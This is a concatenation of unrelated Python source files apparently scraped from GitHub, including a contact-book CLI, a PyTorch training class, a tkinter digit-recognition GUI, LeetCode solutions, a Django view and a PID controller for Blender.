return\n else:\n create_book(name)\n\n elif var == 'rem':\n if list_books():\n print(f'{ti_and_inf()} Введите имя адресной книги, которую надо удалить:\\n'\n f' break - Отменить удаление!')\n name = input(f'{ti_and_you()} > ')\n if name + '.data' in os.listdir(r'books'):\n del_book(name)\n reminder()\n elif name == 'stop':\n return name\n elif name == 'break':\n print(f'{ti_and_inf()} Вы отменили удаление адресной книги!')\n reminder()\n return\n elif name == '':\n print(f\"{ti_and_war()} Вы не ввели имя адресной книги, попробуйте еще раз!\")\n reminder()\n return\n else:\n del_book(name)\n reminder()\n else:\n reminder()\n\n elif var == 'list':\n list_books()\n reminder()\n\n elif var == 'help':\n book_com_info()\n\n elif var == 'book':\n exists_file_convert()\n os.system(r\"explorer.exe Convert Books\")\n reminder()\n\n else:\n print(f'{ti_and_war()} Такой команды не обнаружено')\n reminder()\n\n\n\"\"\"\nРабота с контактами.\n\"\"\"\n\n\ndef contact(name_book):\n print(f'{ti_and_inf()} Для работы со списком контактов, выберите действие:')\n contact_com_info()\n while True:\n com = input(f'{ti_and_you()} > ')\n result_c = input_com_contact(name_book, com)\n if result_c == 'stop':\n return False\n elif result_c == 'rep':\n return True\n elif result_c == 'change':\n return result_c\n\n\ndef input_com_contact(name_book, var):\n if var == 'stop':\n return var\n\n elif var == 'add':\n buff = add_contact(name_book)\n if buff == 'stop':\n return buff\n elif buff == 'break':\n print(f'{ti_and_inf()} Вы отменили добавление контакта')\n blu.reminder()\n return\n blu.reminder()\n\n elif var == 'del':\n if not read_cont(name_book):\n print(f'{ti_and_war()} Список контактов пуст!')\n reminder()\n return\n target = input_target()\n if target == 'stop':\n return target\n elif target == 'break':\n print(f'{ti_and_inf()} Вы отменили удаление контакта')\n blu.reminder()\n return\n if check_target_in_lst(name_book, target):\n print(f'{ti_and_war()} Таких контактов не обнаружено.')\n reminder()\n return\n optional = option_del(name_book, target)\n if optional == 'stop':\n return optional\n elif optional == 'break':\n print(f'{ti_and_inf()} Вы отменили удаление контакта')\n blu.reminder()\n return\n\n elif var == 'read':\n lst = read_cont(name_book)\n if lst:\n print(f'{ti_and_inf()} Список всех контактов в этой адресной книге:')\n for i in range(len(lst)):\n print(f' {i + 1}) {\" \".join(lst[i])}', end='')\n else:\n print(f'{ti_and_war()} Список контактов пуст!')\n reminder()\n\n elif var == 'edit':\n if not read_cont(name_book):\n print(f'{ti_and_war()} Список контактов пуст!')\n reminder()\n return\n target = input_target()\n if target == 'stop':\n return target\n elif target == 'break':\n print(f'{ti_and_inf()} Вы отменили редактирование контакта')\n blu.reminder()\n return\n if check_target_in_lst(name_book, target):\n print(f'{ti_and_war()} Таких контактов не обнаружено.')\n reminder()\n return\n buff = red_contact(name_book, target)\n if buff == 'stop':\n return buff\n elif buff == 'break':\n print(f'{ti_and_inf()} Вы отменили редактирование контакта')\n blu.reminder()\n return\n\n elif var == 'search':\n if not read_cont(name_book):\n print(f'{ti_and_war()} Список контактов пуст!')\n reminder()\n return\n buff = ser_contact(name_book)\n if buff == 'stop':\n return buff\n elif buff == 'break':\n print(f'{ti_and_inf()} Вы отменили поиск контакта')\n blu.reminder()\n return\n\n elif var == 'change':\n return var\n\n elif var == 'help':\n contact_com_info()\n\n elif var == 'convert':\n if not read_cont(name_book):\n print(f'{ti_and_war()} Список контактов пуст!')\n reminder()\n return\n buff = convert_opt(name_book)\n if buff == 'stop':\n return buff\n elif buff == 'break':\n print(f'{ti_and_inf()} Вы отменили конвертацию адресной книги')\n blu.reminder()\n return\n reminder()\n\n elif var == 'book':\n exists_file_convert()\n os.system(r\"explorer.exe Convert Books\")\n reminder()\n\n else:\n print(f'{blu.ti_and_war()} Такой команды не обнаружено')\n reminder()\n","repo_name":"ZeQipe/contact_book-v2.0.0","sub_path":"bl_upper.py","file_name":"bl_upper.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24595841545","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef load_data(data_path, envs, trajs):\n dataset = np.load(data_path)\n assert len(dataset.shape) == 4 # environments, sequences, time steps, dimensions\n data_selection = dataset[envs, trajs]\n data = np.concatenate(data_selection, axis=0) # concatenate all environment sequences\n assert len(data.shape) == 3\n return data\n\n\ndef plot_pred_vs_target(predictions, targets):\n plt.plot(targets[:, 0], targets[:, 2], label='target')\n plt.scatter(targets[0, 0], targets[0, 2], label='start target')\n plt.plot(predictions[:, 0], predictions[:, 2], label='predictions')\n plt.scatter(predictions[0, 0], predictions[0, 2], label='start prediction')\n plt.legend()\n plt.show()\n\n\ndef plot_multiple_heads_and_target(outputs, targets):\n plt.plot(targets[:, 0], targets[:, 2], label='target')\n plt.scatter(targets[0, 0], targets[0, 2], label='start target')\n for predictions in outputs:\n plt.plot(predictions[:, 0], predictions[:, 2], label='predictions')\n plt.scatter(predictions[0, 0], predictions[0, 2], label='start prediction')\n plt.legend()\n plt.show()\n\n\ndef plot_environment(sequences):\n for idx, sequence in enumerate(sequences):\n plt.plot(sequence[:, 0], sequence[:, -1], label=str(idx))\n plt.legend()\n plt.title('Environment sequences')\n plt.show()","repo_name":"leonardbereska/multiheadreservoir","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"41476500761","text":"import torch as t\nfrom sklearn.metrics import f1_score\nfrom tqdm.autonotebook import tqdm\n#from evaluation import create_evaluation\n#from ignite.metrics import Accuracy\nimport shutil\nfrom model import resnet\nfrom torch import onnx\n\n\nclass Trainer:\n\n def __init__(self,\n model, # Model to be trained.\n crit,\n # Loss function\n optim = None, # Optimiser\n train_dl = None, # Training data set\n val_test_dl = None, # Validation (or test) data set\n cuda = True, # Whether to use the GPU\n early_stopping_cb = None): # The stopping criterion.\n self._model = model\n self._crit = crit\n self._optim = optim\n self._train_dl = train_dl\n self._val_test_dl = val_test_dl\n self._cuda = True\n self._early_stopping_cb = early_stopping_cb\n\n if self._cuda:\n self._model = model.cuda()\n self._crit = crit.cuda()\n\n def save_checkpoint(self, epoch):\n #def save_checkpoint(self, epoch, filename='checkpoint.pth.tar'):\n #t.save(epoch,filename)\n t.save({'state_dict': self._model.state_dict()}, 'checkpoints/checkpoint_{:03d}.ckp'.format(epoch))\n\n def restore_checkpoint(self, epoch_n):\n ckp = t.load('checkpoints/checkpoint_{:03d}.ckp'.format(epoch_n), 'cuda' if self._cuda else None)\n self._model.load_state_dict(ckp['state_dict'])\n\n def save_onnx(self, fn):\n m = self._model.cpu()\n m.eval()\n x = t.randn(1, 3, 300, 300, requires_grad=True)\n y = self._model(x)\n t.onnx.export(m, # model being run\n x, # model input (or a tuple for multiple inputs)\n fn, # where to save the model (can be a file or file-like object)\n export_params=True, # store the trained parameter weights inside the model file\n opset_version=10, # the ONNX version to export the model to\n do_constant_folding=True, # whether to execute constant folding for optimization\n input_names = ['input'], # the model's input names\n output_names = ['output'], # the model's output names\n dynamic_axes={'input' : {0 : 'batch_size'}, # variable lenght axes\n 'output' : {0 : 'batch_size'}})\n\n def train_step(self, x, y):\n # perform following steps:\n # -reset the gradients\n self._optim.zero_grad()\n # -propagate through the network\n output = self._model(x)\n # -calculate the loss\n loss = self._crit(output, y)\n # -compute gradient by backward propagation\n loss.backward()\n # -update weights\n self._optim.step()\n # -return the loss\n return loss\n\n\n def val_test_step(self, x, y):\n # predict\n # propagate through the network and calculate the loss and predictions\n predictions = self._model(x)\n loss = self._crit(predictions, y)\n # return the loss and the predictions\n return loss, predictions\n\n def train_epoch(self):\n # TODO: set training mode\n self._model.train()\n # iterate through the training set\n # transfer the batch to \"cuda()\" -> the gpu if a gpu is given\n # perform a training step\n # calculate the average loss for the epoch and return it\n\n running_loss = 0.0\n for x, y in self._train_dl:\n if self._cuda is not False:\n self._model.cuda()\n x = x.cuda()\n y = y.cuda()\n loss = self.train_step(x, y)\n running_loss += loss\n return running_loss/len(self._train_dl)\n #TODO\n\n def val_test(self):\n # set eval mode\n self._model.eval()\n # disable gradient computation\n t.no_grad()\n # iterate through the validation set\n # transfer the batch to the gpu if given\n # perform a validation step\n # save the predictions and the labels for each batch\n # calculate the average loss and average metrics of your choice. You might want to calculate these metrics in designated functions\n # return the loss and print the calculated metrics\n running_loss = 0.0\n\n acc_crack = 0\n acc_inactive = 0\n for x, y in self._val_test_dl:\n if self._cuda is not False:\n self._model.cuda()\n x = x.cuda()\n y = y.cuda()\n loss, predictions = self.val_test_step(x, y)\n running_loss += float(loss)\n return running_loss\n #TODO\n\n def fit(self, epochs=40):\n assert self._early_stopping_cb is not None or epochs > 0\n # create a list for the train and validation losses, and create a counter for the epoch \n train_losses = []\n val_losses = []\n epoch_counter = 0\n #TODO\n while True:\n # stop by epoch number\n if epoch_counter == epochs:\n break\n # train for a epoch and then calculate the loss and metrics on the validation set\n train_loss = self.train_epoch()\n print(epoch_counter)\n print('train loss:')\n print(train_loss)\n val_loss = self.val_test()\n # append the losses to the respective lists\n train_losses.append(train_loss)\n val_losses.append(val_loss)\n print('val loss:')\n print(val_loss)\n # use the save_checkpoint function to save the model for each epoch\n Trainer.save_checkpoint(self, epoch_counter)\n #Trainer.save_onnx(self, exp)\n #self.save_checkpoint({'epoch_counter': epoch_counter + 1,'state_dict': self._model.state_dict()})\n #self.save_checkpoint(epoch_counter)\n # check whether early stopping should be performed using the early stopping callback and stop if so\n if self._early_stopping_cb.step(train_losses):\n break\n #print(\"No early stopping\")\n epoch_counter += 1\n #print(epoch_counter)\n\n # return the loss lists for both training and validation\n return train_losses, val_losses\n #TODO\n \n \n \n ","repo_name":"Prajnita/Image-Classification-of-Solar-Panels","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7161852014","text":"\"\"\"Number Recognition Application for testing deep learning models\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\nfrom pathlib import Path\nimport io\nfrom PIL import Image\nfrom number_recognition_tools import predict_number_image\n\nMODELS_FOLDER = Path('trained_models')\nMODELS_PATH = [model for model in MODELS_FOLDER.iterdir()]\n\n\ndef extract_model_name(model_name):\n \"\"\"Extract model name from it's path\"\"\"\n return (str(model_name).split('\\\\')[1]).split('.')[0]\n\n\nMODELS_NAME = [extract_model_name(model) for model in MODELS_PATH]\nMODELS_DICT = {k: v for (k, v) in zip(MODELS_NAME, MODELS_PATH)}\n\nIMAGE_FOLDER = Path('number_images')\nIMAGE_NAME = Path('drawed_image.png')\nIMAGE_PATH = Path.joinpath(IMAGE_FOLDER, IMAGE_NAME)\n\n\nclass NumberRecognitionInterface:\n \"\"\" A class for GUI Packaging\"\"\"\n\n def __init__(self):\n main_window = tk.Tk(className='dAriush Number Recognition AI')\n window_size = (1100, 500)\n main_window.geometry(f\"{window_size[0]}x{window_size[1]}\")\n main_window.configure(bg='#006266')\n button_font = (\"Karla\", 12, \"bold\")\n menu_font = (\"Karla\", 10, 'bold')\n result_label_font = (\"Karla\", 15, \"bold\")\n canvas_background_color = 'white'\n canvas_size = (500, 500)\n self.drawing_area = tk.Canvas(main_window,\n bg=canvas_background_color,\n height=canvas_size[1],\n width=canvas_size[0])\n\n self.is_mouse_clicked = False\n self.drawing_area.bind(\"<Motion>\", self.draw)\n self.drawing_area.bind(\"<ButtonPress-1>\", self.mouse_clicked_in_canvas)\n self.drawing_area.bind(\"<ButtonRelease-1>\",\n self.mouse_released_in_canvas)\n self.drawing_area.grid(row=0, column=0, rowspan=3)\n\n clear_button = tk.Button(main_window, text='Clear All',\n command=self.clear_canvas,\n height=1,\n width=50)\n clear_button.configure(font=button_font, bg='#cd84f1', bd=3,\n activebackground='#c56cf0')\n clear_button.grid(row=2, column=1, columnspan=2)\n\n combobox_label = tk.Label(main_window, text='Choose Model: ')\n combobox_label.configure(font=menu_font, bg='#ffcccc')\n combobox_label.grid(row=0, column=1, sticky=tk.E)\n\n self.models_combobox = ttk.Combobox(main_window, width=47, height=5,\n values=MODELS_NAME)\n self.models_combobox.current(0)\n self.models_combobox.configure(font=menu_font)\n self.models_combobox.grid(row=0, column=2)\n\n self.guess_label = tk.Label(main_window, text=\"draw a number!\",\n height=1,\n width=20)\n self.guess_label.configure(font=result_label_font, bg='#fc5c65')\n self.guess_label.grid(row=1, column=2)\n\n guess_button = tk.Button(main_window, text='Guess!!',\n command=self.guess_image,\n height=1,\n width=10)\n guess_button.configure(font=button_font, bg='#2ecc71', bd=3,\n activebackground='#1abc9c')\n guess_button.grid(row=1, column=1, padx=10)\n\n main_window.mainloop()\n\n def draw(self, event):\n \"\"\" canvas updating method\"\"\"\n if self.is_mouse_clicked:\n self.x_end = event.x\n self.y_end = event.y\n event.widget.create_line(self.x_start, self.y_start,\n self.x_end, self.y_end,\n smooth=tk.TRUE, fill=\"black\", width=10)\n\n self.x_start = event.x\n self.y_start = event.y\n\n def mouse_clicked_in_canvas(self, event):\n \"\"\"mouse click method\"\"\"\n self.is_mouse_clicked = True\n self.x_start = event.x\n self.y_start = event.y\n\n def mouse_released_in_canvas(self, event):\n \"\"\"mouse release method\"\"\"\n self.is_mouse_clicked = False\n\n def clear_canvas(self):\n \"\"\"clear canvas method\"\"\"\n self.drawing_area.delete(\"all\")\n\n def save_as_png(self):\n \"\"\"saving method\"\"\"\n print('Saving!')\n post_script = self.drawing_area.postscript(colormode='color')\n img = Image.open(io.BytesIO(post_script.encode('utf-8')))\n img.save(IMAGE_PATH, 'png')\n print('Saved!')\n\n def guess_image(self):\n \"\"\"AI gues method\"\"\"\n self.save_as_png()\n current_model_path = MODELS_DICT[self.models_combobox.get()]\n model_guess = predict_number_image(current_model_path, IMAGE_PATH)\n self.guess_label['text'] = model_guess\n\n\nif __name__ == '__main__':\n NumberRecognitionInterface()\n","repo_name":"dariush-bahrami/Number-Recognition-Application","sub_path":"number_recognition_gui.py","file_name":"number_recognition_gui.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5622800860","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def prepend(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n self.length += 1\n\n def binary_to_decimal(self):\n num = 0\n current = self.head\n while current is not None:\n num = num*2+current.value\n current = current.next\n return num\n\n\nll = LinkedList(1)\nll.prepend(1)\nll.prepend(0)\nll.prepend(0)\nll.prepend(1)\n\nresults = ll.binary_to_decimal()\nprint(results)\n","repo_name":"bnasare/DSA","sub_path":"LINKED LIST/LeetCode Questions/binary_to_decimal.py","file_name":"binary_to_decimal.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27344811723","text":"from time import time\n\n\nclass Solution:\n\n def multiply(self, num1: str, num2: str) -> str:\n results = []\n for j in range(len(num2)-1, -1, -1):\n carry = 0\n result = 0\n for i in range(len(num1) - 1, -1, -1):\n prod = int(num1[i]) * int(num2[j]) + carry\n carry = prod // 10\n result += prod%10 * 10**(len(num1)-i-1)\n result += carry*(10**len(num1))\n result *= 10**(len(num2)-j-1)\n results.append(result)\n return str(sum(results))\n\n\nstart_time = time()\n\n_num1 = \"123\"\n_num2 = \"456\"\n_num1 = \"123\"\n_num2 = \"0\"\n\n# Input: num1 = \"123\", num2 = \"456\"\n# Output: \"56088\"\n\nprint(Solution().multiply(_num1, _num2))\n\nprint(\"--- %s seconds ---\" % (time() - start_time))","repo_name":"Sadomtsevvs/Leetcode","sub_path":"43. Multiply Strings.py","file_name":"43. Multiply Strings.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17166120660","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n# 解法一: 递归,时间复杂度O(N), 空间复杂度O(N)\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n\n def _build(preorder, inorder):\n if not preorder: return \n\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n\n root.left = _build(preorder[1: index + 1], inorder[: index])\n root.right = _build(preorder[index + 1: ], inorder[index + 1: ])\n return root\n\n return _build(preorder, inorder)\n","repo_name":"PangYunsheng8/LeetCode","sub_path":"剑指offer/重建二叉树.py","file_name":"重建二叉树.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17937268472","text":"from utils import *\r\nfrom bounce import Bounce\r\nfrom particle import Particle\r\nfrom square import Square\r\nfrom time import time as get_current_time\r\nfrom scorekeeper import Scorekeeper\r\nimport random\r\nimport pygame\r\n\r\n\r\nclass World:\r\n \"\"\"it's a cruel world out there\"\"\"\r\n\r\n def __init__(self):\r\n self.future_bounces: list[Bounce] = []\r\n self.past_bounces: list[Bounce] = []\r\n self.start_time = 0\r\n self.time = 0\r\n self.rectangles: list[pygame.Rect] = []\r\n self.particles: list[Particle] = []\r\n self.timestamps = []\r\n self.square = Square()\r\n self.scorekeeper = Scorekeeper(self)\r\n\r\n def update_time(self) -> None:\r\n self.time = get_current_time() - self.start_time\r\n\r\n def next_bounce(self) -> Bounce:\r\n self.past_bounces.append(self.future_bounces.pop(0))\r\n return self.past_bounces[-1]\r\n\r\n def add_particles(self, sp: list[float], sd: list[float]):\r\n for _ in range(Config.particle_amount):\r\n new = Particle([sp[0]+random.randint(-10, 10), sp[1]+random.randint(-10, 10)], sd)\r\n self.particles.append(new)\r\n\r\n def handle_bouncing(self, square: Square):\r\n if len(self.future_bounces):\r\n if (self.time * 1000 + Config.music_offset)/1000 > self.future_bounces[0].time:\r\n current_bounce = self.next_bounce()\r\n before = square.dir.copy()\r\n square.obey_bounce(current_bounce)\r\n changed = square.dir.copy()\r\n for _ in range(2):\r\n if before[_] == changed[_]:\r\n changed[_] = 0\r\n else:\r\n changed[_] = -changed[_]\r\n self.add_particles(square.pos, changed)\r\n\r\n # stop square at end\r\n if len(self.future_bounces) == 0:\r\n square.dir = [0, 0]\r\n square.pos = current_bounce.square_pos\r\n\r\n def handle_keypress(self, time_from_start, misses):\r\n return self.scorekeeper.do_keypress(time_from_start, misses)\r\n\r\n def gen_future_bounces(self, _start_notes: list[tuple[int, int, int]], percent_update_callback):\r\n \"\"\"Recursive solution is necessary\"\"\"\r\n total_notes = len(_start_notes)\r\n max_percent = 0\r\n path = []\r\n safe_areas = []\r\n force_return = 0\r\n\r\n def recurs(\r\n square: Square,\r\n notes: list[float],\r\n bounces_so_far: list[Bounce] = None,\r\n prev_index_priority=None,\r\n t: float = 0,\r\n depth: int = 0\r\n ) -> Union[list[Bounce], bool]:\r\n nonlocal force_return, max_percent\r\n if prev_index_priority is None:\r\n prev_index_priority = [0, 1]\r\n if bounces_so_far is None:\r\n bounces_so_far = []\r\n gone_through_percent = (total_notes-len(notes)) * 100 // total_notes\r\n while gone_through_percent > max_percent:\r\n max_percent += 1\r\n if percent_update_callback(f\"{max_percent}% done generating map\"):\r\n raise UserCancelsLoadingError()\r\n\r\n all_bounce_rects = [_bounc.get_collision_rect() for _bounc in bounces_so_far]\r\n if len(notes) == 0:\r\n return bounces_so_far\r\n # print(depth * 100 // total_notes)\r\n path_segment_start = len(path)\r\n start_rect = square.rect.copy()\r\n while True:\r\n t += 1/FRAMERATE\r\n square.reg_move(False)\r\n path.append(square.rect)\r\n if t > notes[0]:\r\n # no collision (we good)\r\n bounce_indexes = prev_index_priority\r\n\r\n # randomly change direction every X% of the time\r\n if random.random() * 100 < Config.direction_change_chance:\r\n bounce_indexes = list(bounce_indexes.__reversed__())\r\n\r\n # add safe area\r\n safe_areas.append(start_rect.union(square.rect))\r\n\r\n for direction_to_bounce in bounce_indexes:\r\n square.dir[direction_to_bounce] *= -1\r\n bounces_so_far.append(Bounce(square.pos, square.dir, t, direction_to_bounce))\r\n\r\n toextend = recurs(\r\n square=square.copy(),\r\n notes=notes[1:],\r\n bounces_so_far=[_b.copy() for _b in bounces_so_far],\r\n t=t,\r\n prev_index_priority=bounce_indexes.copy(),\r\n depth=depth+1\r\n )\r\n\r\n if toextend:\r\n return toextend\r\n else:\r\n bounces_so_far = bounces_so_far[:-1]\r\n square.dir[direction_to_bounce] *= -1\r\n\r\n # instead of trying other path from here, just exit a bit back to try another from previous\r\n if force_return:\r\n force_return -= 1\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n continue\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n othercheck = False\r\n if len(bounces_so_far):\r\n othercheck = bounces_so_far[-1].get_collision_rect().collidelist(path[:-10])+1\r\n\r\n if square.rect.collidelist(all_bounce_rects) != -1 or othercheck:\r\n if depth > 200:\r\n if random.random() < Config.backtrack_chance:\r\n max_percent -= (Config.backtrack_amount * 100 // total_notes) + 1\r\n force_return = Config.backtrack_amount\r\n\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n _start_notes = _start_notes[:Config.max_notes] if Config.max_notes is not None else _start_notes\r\n\r\n self.scorekeeper.unhit_notes = remove_too_close_values([_sn for _sn in _start_notes], Config.bounce_min_spacing)\r\n\r\n self.future_bounces = recurs(\r\n square=self.square.copy(),\r\n notes=remove_too_close_values(\r\n [_sn for _sn in _start_notes],\r\n threshold=Config.bounce_min_spacing\r\n )\r\n )\r\n\r\n if self.future_bounces is False:\r\n raise MapLoadingFailureError(\"The map failed to generate because of the recursion function. \" +\r\n \"If the midi has too many notes too close, it may not generate. Maybe try changing the square speed?\")\r\n\r\n if len(self.future_bounces) == 0:\r\n raise MapLoadingFailureError(\"Map safearea list empty. Please report to the github under the issues tab\")\r\n\r\n percent_update_callback(\"Removing overlapping safe areas\")\r\n\r\n # eliminate fully overlapping safe areas\r\n safe_areas: list[pygame.Rect]\r\n while True:\r\n new = []\r\n before_safe_count = len(safe_areas)\r\n for safe1 in safe_areas:\r\n for safe2 in safe_areas:\r\n if safe2 == safe1:\r\n continue\r\n if safe2.contains(safe1):\r\n break\r\n else:\r\n new.append(safe1)\r\n safe_areas = new.copy()\r\n after_safe_count = len(safe_areas)\r\n if after_safe_count == before_safe_count:\r\n break\r\n safe_areas = safe_areas\r\n\r\n self.rectangles = [_fb.get_collision_rect() for _fb in self.future_bounces]\r\n return safe_areas\r\n","repo_name":"quasar098/midi-playground","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":8025,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"54"} +{"seq_id":"22719270580","text":"from django.shortcuts import get_object_or_404, render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.defaultfilters import slugify\nfrom datetime import *\nfrom pytz import *\nfrom decimal import *\nfrom ursula.models import PostCategory, PostCategoryForm, PostCategoryList\n\nimport urllib\n\n\n# meta functions\n\n\n@login_required\ndef index(request):\n item_list = PostCategory.objects.all().order_by('-title')\n return render_to_response('ursula/postcategories/postcategories-list.html',\n {'item_list': item_list\n }, context_instance=RequestContext(request)\n )\n\n \n@login_required\ndef edit(request, id=\"\"):\n submit_action = ''\n form = PostCategoryForm()\n item = \"\"\n \n if id != \"\":\n item = PostCategory.objects.get(pk=id) \n if request.method == 'POST':\n if request.POST['submit_action'] == 'Add':\n form = PostCategoryForm(request.POST)\n if form.is_valid():\n item = form.save()\n \n return HttpResponseRedirect('/postcategories/') # Redirect after POST\n else:\n submit_action = 'Add'\n if request.POST['submit_action'] == 'Update':\n form = PostCategoryForm(request.POST, instance=item)\n if form.is_valid():\n item = form.save()\n \n return HttpResponseRedirect('/postcategories/')\n else:\n submit_action = 'Update'\n if request.method == 'GET':\n if id:\n submit_action = 'Update'\n item = get_object_or_404(PostCategory, pk=id)\n form = PostCategoryForm(instance=item)\n else:\n submit_action = 'Add'\n \n return render_to_response(\n 'ursula/postcategories/postcategories-edit.html',\n { 'request': request,\n 'form': form,\n 'submit_action': submit_action,\n 'edit_id': id,\n 'item': item,\n }, \n context_instance=RequestContext(request))\n \n \ndef create_ajax(request):\n cat_name = request.POST.get('category_name', '')\n cat_slug = create_slug(cat_name)\n\n cat = PostCategory()\n cat.title = cat_name\n cat.slug = cat_slug\n cat.is_active = 1\n cat.save()\n \n return HttpResponse(cat.id)\n \n \n \ndef gen_slug(request):\n return HttpResponse(create_slug(request.GET.get('slug', '')))\n\ndef create_slug(slug):\n new_slug = slugify(slug)\n orig_slug = new_slug\n #check for slug already existing\n counter = 1\n while (PostCategory.objects.all().filter(slug=new_slug).count() > 0):\n new_slug = orig_slug + \"-\" + str(counter)\n counter += 1\n \n return new_slug\n\n\n\n ","repo_name":"stbarrett/dc_test","sub_path":"_lib/ursula/postcategories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73357341603","text":"import bpy\nimport mathutils\nfrom random import randint, uniform\nfrom math import *\nimport os\nimport json\nfrom mathutils import Vector, Quaternion\nfrom time import sleep \n\n\n\nimport time\nimport warnings\n#from scripts import PID\n\n\nimport time\nimport warnings\n\n\ndef _clamp(value, limits):\n lower, upper = limits\n if value is None:\n return None\n elif upper is not None and value > upper:\n return upper\n elif lower is not None and value < lower:\n return lower\n return value\n\n\ntry:\n # get monotonic time to ensure that time deltas are always positive\n _current_time = time.monotonic\nexcept AttributeError:\n # time.monotonic() not available (using python < 3.3), fallback to time.time()\n _current_time = time.time\n warnings.warn('time.monotonic() not available in python < 3.3, using time.time() as fallback')\n\n\nclass PID(object):\n \"\"\"\n A simple PID controller. No fuss.\n \"\"\"\n\n def __init__(self,\n Kp=1.0, Ki=0.0, Kd=0.0,\n setpoint=0,\n sample_time=0.01,\n output_limits=(None, None),\n auto_mode=True,\n proportional_on_measurement=False):\n \"\"\"\n :param Kp: The value for the proportional gain Kp\n :param Ki: The value for the integral gain Ki\n :param Kd: The value for the derivative gain Kd\n :param setpoint: The initial setpoint that the PID will try to achieve\n :param sample_time: The time in seconds which the controller should wait before generating a new output value.\n The PID works best when it is constantly called (eg. during a loop), but with a sample\n time set so that the time difference between each update is (close to) constant. If set to\n None, the PID will compute a new output value every time it is called.\n :param output_limits: The initial output limits to use, given as an iterable with 2 elements, for example:\n (lower, upper). The output will never go below the lower limit or above the upper limit.\n Either of the limits can also be set to None to have no limit in that direction. Setting\n output limits also avoids integral windup, since the integral term will never be allowed\n to grow outside of the limits.\n :param auto_mode: Whether the controller should be enabled (in auto mode) or not (in manual mode)\n :param proportional_on_measurement: Whether the proportional term should be calculated on the input directly\n rather than on the error (which is the traditional way). Using\n proportional-on-measurement avoids overshoot for some types of systems.\n \"\"\"\n self.Kp, self.Ki, self.Kd = Kp, Ki, Kd\n self.setpoint = setpoint\n self.sample_time = sample_time\n\n self._min_output, self._max_output = output_limits\n self._auto_mode = auto_mode\n self.proportional_on_measurement = proportional_on_measurement\n\n self.reset()\n\n def __call__(self, input_, dt=None):\n \"\"\"\n Call the PID controller with *input_* and calculate and return a control output if sample_time seconds has\n passed since the last update. If no new output is calculated, return the previous output instead (or None if\n no value has been calculated yet).\n :param dt: If set, uses this value for timestep instead of real time. This can be used in simulations when\n simulation time is different from real time.\n \"\"\"\n if not self.auto_mode:\n return self._last_output\n\n now = _current_time()\n if dt is None:\n dt = now - self._last_time if now - self._last_time else 1e-16\n elif dt <= 0:\n raise ValueError(\"dt has nonpositive value {}. Must be positive.\".format(dt))\n\n if self.sample_time is not None and dt < self.sample_time and self._last_output is not None:\n # only update every sample_time seconds\n return self._last_output\n\n # compute error terms\n error = self.setpoint - input_\n d_input = input_ - (self._last_input if self._last_input is not None else input_)\n\n # compute the proportional term\n if not self.proportional_on_measurement:\n # regular proportional-on-error, simply set the proportional term\n self._proportional = self.Kp * error\n else:\n # add the proportional error on measurement to error_sum\n self._proportional -= self.Kp * d_input\n\n # compute integral and derivative terms\n self._integral += self.Ki * error * dt\n self._integral = _clamp(self._integral, self.output_limits) # avoid integral windup\n\n self._derivative = -self.Kd * d_input / dt\n\n # compute final output\n output = self._proportional + self._integral + self._derivative\n output = _clamp(output, self.output_limits)\n\n # keep track of state\n self._last_output = output\n self._last_input = input_\n self._last_time = now\n\n return output\n\n @property\n def components(self):\n \"\"\"\n The P-, I- and D-terms from the last computation as separate components as a tuple. Useful for visualizing\n what the controller is doing or when tuning hard-to-tune systems.\n \"\"\"\n return self._proportional, self._integral, self._derivative\n\n @property\n def tunings(self):\n \"\"\"The tunings used by the controller as a tuple: (Kp, Ki, Kd)\"\"\"\n return self.Kp, self.Ki, self.Kd\n\n @tunings.setter\n def tunings(self, tunings):\n \"\"\"Setter for the PID tunings\"\"\"\n self.Kp, self.Ki, self.Kd = tunings\n\n @property\n def auto_mode(self):\n \"\"\"Whether the controller is currently enabled (in auto mode) or not\"\"\"\n return self._auto_mode\n\n @auto_mode.setter\n def auto_mode(self, enabled):\n \"\"\"Enable or disable the PID controller\"\"\"\n self.set_auto_mode(enabled)\n\n def set_auto_mode(self, enabled, last_output=None):\n \"\"\"\n Enable or disable the PID controller, optionally setting the last output value.\n This is 